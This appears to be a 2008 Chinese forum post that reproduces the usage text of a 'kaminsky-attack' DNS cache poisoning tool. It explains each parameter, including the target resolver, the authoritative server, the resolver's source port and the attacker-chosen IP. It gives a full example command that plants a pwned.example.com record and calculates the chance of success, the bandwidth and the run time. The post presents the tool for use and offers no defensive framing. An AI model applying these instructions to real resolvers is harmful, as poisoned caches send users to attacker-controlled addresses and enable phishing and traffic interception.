|
|
发表于 2008-7-30 16:32:55
|
显示全部楼层
- Usage: kaminsky-attack <ip-querier> <ip-resolver> <ip-authoritative> <port-resolver>
- <subhost> <domain> <any-ip> <attempts> <repl-per-attempt>
- <ip-querier> Source IP used when sending queries for random hostnames
- (typically your IP)
- <ip-resolver> Target DNS resolver to attack
- <ip-authoritative> One of the authoritative DNS servers for <domain>
- <port-resolver> Source port used by the resolver when forwarding queries
- <subhost> Poison the cache with the A record <subhost>.<domain>
- <domain> Domain name, see <subhost>.
- <any-ip> IP of your choice to be associated to <subhost>.<domain>
- <attempts> Number of poisoning attemps, more attempts increase the
- chance of successful poisoning, but also the attack time
- <repl-per-attempt> Number of spoofed replies to send per attempt, more replies
- increase the chance of successful poisoning but, but also
- the rate of packet loss
- Example:
- $ kaminsky-attack q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16
- This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear
- in r.r.r.r's cache. The chance of successfully poisoning the resolver with
- this example (8192 attempts and 16 replies/attempt) is 86%
- (1-(1-16/65536)**8192). This example also requires a bandwidth of about
- 2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *
- 8 bits/byte) and takes about 80 secs to complete (8192 attempts /
- 100 attempts/sec).
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?注册
x
|
IP卡
狗仔卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
楼主